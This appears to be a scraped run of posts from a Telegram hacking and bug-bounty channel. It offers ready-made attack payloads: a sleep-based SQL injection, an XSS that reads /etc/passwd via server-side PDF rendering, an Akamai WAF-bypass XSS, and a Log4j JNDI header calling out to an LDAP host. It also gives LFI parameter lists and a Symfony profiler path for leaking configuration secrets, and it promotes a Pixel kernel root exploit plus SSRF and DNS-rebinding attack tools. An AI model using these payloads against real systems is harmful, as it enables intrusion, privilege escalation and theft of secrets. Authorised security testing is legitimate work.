If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Canarytokens

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

🌐 Site

#Pentesting #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Translate JavaScript to other writing systems!

Site

ΔYロIᗐコΞ 👾
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS to Exfiltrate Data from PDFs

<noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</noscript><noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</noscript>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403

#Notification #NewYear
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Log4j 🙌 Application was running java

Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}

#BugBounty #Tips #Security
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Easy P1 🔥
Add to your wordlist

/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

⬇️ Download
🔓 BugCod3

#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python noscript automates the enumaration of S3 Buckets referenced in a subdomain's javanoscript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.

Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:

pip install requests

Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt

Github

⬇️ Download
🔓 BugCod3

#Python #Amazon #S3 #Buckets
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.

By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.

SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.

Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic

Installation:

gem install ssrf_proxy

Usage (command line):

ssrf-proxy [options] -u <SSRF URL>

ssrf-proxy -u http://target/?url=xxURLxx

Github

⬇️ Download
🔓 BugCod3

#Ruby #Proxy #SSRF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:

sudo pip install dnslib flask flask_cors

Usage:

sudo python httprebind.py domain.name serverIp mode

Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.

Github

⬇️ Download
🔓 BugCod3

#Python #DNS #SSRF #Attack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

hackerone-reports

Top disclosed reports from HackerOne

Tops of HackerOne reports. All reports' raw info stored in data.csv. Scripts to update this file are written in Python 3 and require chromedriver and Chromium executables at PATH. Every noscript contains some info about how it works. The run order of noscripts:


1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py

Github

⬇️ Download
🔓 BugCod3

#BugBounty #Reports #HackeOne
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3